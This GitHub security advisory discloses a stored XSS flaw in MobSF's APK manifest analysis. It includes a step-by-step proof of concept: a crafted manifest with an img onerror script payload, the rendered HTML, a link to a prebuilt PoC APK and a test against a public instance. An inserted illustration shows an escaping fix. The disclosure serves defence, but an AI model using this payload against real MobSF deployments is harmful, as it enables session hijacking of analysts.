GHSA-8HF7-H89P-3PQJ

Vulnerability from github – Published: 2026-01-26 23:36 – Updated: 2026-01-26 23:36
Summary
MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field
Details

Summary

A Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session by uploading a malicious APK. The android:host attribute from <data android:scheme="android_secret_code"> elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.

Details

When MobSF analyzes an Android APK containing a <data> element with android:scheme="android_secret_code", it extracts the android:host attribute and inserts it directly into the analysis report without HTML escaping.

Vulnerable Code Path

1. Data Extraction - mobsf/StaticAnalyzer/views/android/manifest_analysis.py (line 776):

xmlhost = data.getAttribute(f'{ns}:host')
ret_list.append(('dialer_code_found', (xmlhost,), ()))

2. Template String Formatting - mobsf/StaticAnalyzer/views/android/manifest_analysis.py (line 806):

'title': a_template['title'] % t_name,  # XSS payload inserted here unescaped

3. Template Definition - mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py (line 200):

'dialer_code_found': {
    'title': 'Dailer Code: %s Found <br>[android:scheme=\"android_secret_code\"]',
    ...
}

4. Unsafe Rendering - mobsf/templates/static_analysis/android_binary_analysis.html (line 1143):

{{item|key:"title" | safe}}

The |safe Django template filter bypasses auto-escaping, allowing the unescaped android:host value to be rendered as raw HTML.
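As an added illustration (not code from the advisory or from the MobSF project), the following Python reproduces the extraction and title-formatting steps described above on a constructed manifest and shows the hardening a maintainer would apply: escaping the untrusted android:host value before it is interpolated into the title, so that the template's own <br> can still pass through |safe while attacker-controlled angle brackets cannot. The function names, the sample manifest and the has_untrusted_markup regression check are assumptions of this example; the page does not state whether the project's fix in 4.4.5 takes this exact form.

```python
import html
import xml.dom.minidom

# Constructed manifest mirroring the advisory's PoC. The XML entities in the
# attribute decode to a raw <img> tag once the parser reads the value, which is
# exactly what the extraction step hands to the report.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.poc.xsstest">
    <application android:label="XSS PoC Test">
        <receiver android:name=".SecretCodeReceiver" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:scheme="android_secret_code"
                      android:host="&lt;img src=x onerror=alert(document.domain)&gt;"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""

# Title template as quoted in the advisory. The <br> is intended markup (the
# reason the rendering side applies |safe); the %s is the untrusted host value.
DIALER_CODE_TITLE = 'Dailer Code: %s Found <br>[android:scheme="android_secret_code"]'


def extract_secret_code_hosts(manifest_xml, ns='android'):
    """Return the android:host values of <data> elements whose scheme is
    android_secret_code, the way the advisory describes the extraction step."""
    doc = xml.dom.minidom.parseString(manifest_xml)
    hosts = []
    for data in doc.getElementsByTagName('data'):
        if data.getAttribute(f'{ns}:scheme') == 'android_secret_code':
            hosts.append(data.getAttribute(f'{ns}:host'))
    return hosts


def build_title_vulnerable(host):
    """Untrusted value interpolated verbatim: whatever the APK author wrote
    becomes markup once the template renders the title with |safe."""
    return DIALER_CODE_TITLE % host


def build_title_hardened(host):
    """Escape the untrusted value *before* it meets the template, so the
    template's own <br> survives |safe while attacker-controlled angle
    brackets and quotes are rendered as text."""
    return DIALER_CODE_TITLE % html.escape(host, quote=True)


def has_untrusted_markup(rendered, untrusted):
    """Regression check for the report builder: a rendered title must not
    contain the raw untrusted string when that string carries
    HTML-significant characters."""
    return any(ch in untrusted for ch in '<>"\'&') and untrusted in rendered


if __name__ == '__main__':
    for host in extract_secret_code_hosts(SAMPLE_MANIFEST):
        print('vulnerable:', build_title_vulnerable(host))
        print('hardened:  ', build_title_hardened(host))
```

Escaping at the point where untrusted data is formatted into a string that will later be marked safe is the general rule here: once a string reaches |safe, the template engine no longer distinguishes the author's <br> from the attacker's <img>, so the distinction has to be made before the two are concatenated.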

PoC

Step 1: Create Malicious APK

Create an APK with the following AndroidManifest.xml:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.poc.xsstest"
    android:versionCode="1"
    android:versionName="1.0">

    <application android:label="XSS PoC Test">
        <receiver android:name=".SecretCodeReceiver" android:exported="true">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <data android:scheme="android_secret_code"
                      android:host="&lt;img src=x onerror=alert(document.domain)&gt;"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>

Step 2: Build the APK

Use apktool or Android build tools to create a valid APK with this manifest.

Step 3: Upload to MobSF

Upload the malicious APK to MobSF for static analysis.

Step 4: Trigger XSS

View the static analysis report in a browser. The JavaScript payload executes automatically.

Confirmed HTML Output

<td>
Dailer Code: <img src=x onerror=alert(document.domain)> Found <br>[android:scheme="android_secret_code"]
</td>

PoC APK Details

Field      Value
Filename   POC_XSS_APK.apk
MD5 Hash   647258656ed03a7e6a0f2acce4ec6a5b
Location   https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk

Impact

This is a Stored Cross-site Scripting (XSS) vulnerability affecting any MobSF user who views the analysis results of the malicious APK file.

Attack Scenario

  1. Attacker crafts a malicious APK with XSS payload in the manifest
  2. Attacker submits the APK to a shared or private MobSF instance.
  3. When any user views the analysis report, the XSS payload executes in their browser

[Screenshot 2026-01-15 at 12 24 29 AM]

Tested on the public MobSF instance as well: https://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/

[Screenshot 2026-01-15 at 12 24 57 AM]


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mobsf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24490"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-26T23:36:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA Stored Cross-site Scripting (XSS) vulnerability in MobSF\u0027s Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim\u0027s browser session by uploading a malicious APK. The `android:host` attribute from `\u003cdata android:scheme=\"android_secret_code\"\u003e` elements is rendered in HTML reports without sanitization, enabling session hijacking and account takeover.\n\n### Details\nWhen MobSF analyzes an Android APK containing a `\u003cdata\u003e` element with `android:scheme=\"android_secret_code\"`, it extracts the `android:host` attribute and inserts it directly into the analysis report without HTML escaping.\n\n### Vulnerable Code Path\n\n**1. Data Extraction** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 776):\n```python\nxmlhost = data.getAttribute(f\u0027{ns}:host\u0027)\nret_list.append((\u0027dialer_code_found\u0027, (xmlhost,), ()))\n```\n\n**2. Template String Formatting** - `mobsf/StaticAnalyzer/views/android/manifest_analysis.py` (line 806):\n```python\n\u0027title\u0027: a_template[\u0027title\u0027] % t_name,  # XSS payload inserted here unescaped\n```\n\n**3. Template Definition** - `mobsf/StaticAnalyzer/views/android/kb/android_manifest_desc.py` (line 200):\n```python\n\u0027dialer_code_found\u0027: {\n    \u0027title\u0027: \u0027Dailer Code: %s Found \u003cbr\u003e[android:scheme=\\\"android_secret_code\\\"]\u0027,\n    ...\n}\n```\n\n**4. Unsafe Rendering** - `mobsf/templates/static_analysis/android_binary_analysis.html` (line 1143):\n```html\n{{item|key:\"title\" | safe}}\n```\n\nThe `|safe` Django template filter bypasses auto-escaping, allowing the unescaped `android:host` value to be rendered as raw HTML.\n\n### PoC\n\n### Step 1: Create Malicious APK\n\nCreate an APK with the following `AndroidManifest.xml`:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n\u003cmanifest xmlns:android=\"http://schemas.android.com/apk/res/android\"\n    package=\"com.poc.xsstest\"\n    android:versionCode=\"1\"\n    android:versionName=\"1.0\"\u003e\n\n    \u003capplication android:label=\"XSS PoC Test\"\u003e\n        \u003creceiver android:name=\".SecretCodeReceiver\" android:exported=\"true\"\u003e\n            \u003cintent-filter\u003e\n                \u003caction android:name=\"android.provider.Telephony.SECRET_CODE\"/\u003e\n                \u003cdata android:scheme=\"android_secret_code\"\n                      android:host=\"\u0026lt;img src=x onerror=alert(document.domain)\u0026gt;\"/\u003e\n            \u003c/intent-filter\u003e\n        \u003c/receiver\u003e\n    \u003c/application\u003e\n\u003c/manifest\u003e\n```\n\n### Step 2: Build the APK\n\nUse apktool or Android build tools to create a valid APK with this manifest.\n\n### Step 3: Upload to MobSF\n\nUpload the malicious APK to MobSF for static analysis.\n\n### Step 4: Trigger XSS\n\nView the static analysis report in a browser. The JavaScript payload executes automatically.\n\n### Confirmed HTML Output\n\n```html\n\u003ctd\u003e\nDailer Code: \u003cimg src=x onerror=alert(document.domain)\u003e Found \u003cbr\u003e[android:scheme=\"android_secret_code\"]\n\u003c/td\u003e\n```\n\n### PoC APK Details\n\n| Field | Value |\n|-------|-------|\n| **Filename** | `POC_XSS_APK.apk ` |\n| **MD5 Hash** | `647258656ed03a7e6a0f2acce4ec6a5b` |\n| **Location** | https://github.com/smaranchand/poc/raw/refs/heads/main/POC_XSS_APK.apk |\n\n### Impact\n\nThis is a **Stored Cross-site Scripting (XSS)** vulnerability affecting all MobSF users who analyze the results of the malicious APK file.\n\n### Attack Scenario\n\n1. Attacker crafts a malicious APK with XSS payload in the manifest\n2. Attacker submits APK to a shared MobSF instance or  private mobsf instance. \n3. When any user views the analysis report, the XSS payload executes in their browser\n\n\u003cimg width=\"1435\" height=\"675\" alt=\"Screenshot 2026-01-15 at 12 24 29\u202fAM\" src=\"https://github.com/user-attachments/assets/e282a0b2-236e-4199-a7ce-b96017cc7052\" /\u003e\n\n\nTested in MobSF Public Instance as well.\nhttps://mobsf.live/static_analyzer/647258656ed03a7e6a0f2acce4ec6a5b/ \n\n\n\u003cimg width=\"1440\" height=\"780\" alt=\"Screenshot 2026-01-15 at 12 24 57\u202fAM\" src=\"https://github.com/user-attachments/assets/8673b76a-954a-45e7-833a-a64e0a972f2e\" /\u003e",
  "id": "GHSA-8hf7-h89p-3pqj",
  "modified": "2026-01-26T23:36:19Z",
  "published": "2026-01-26T23:36:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-8hf7-h89p-3pqj"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/2b08dd050e7685ee2a14fdbb454affab94129eae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "MobSF has Stored XSS via Manifest Analysis - Dialer Code Host Field"
}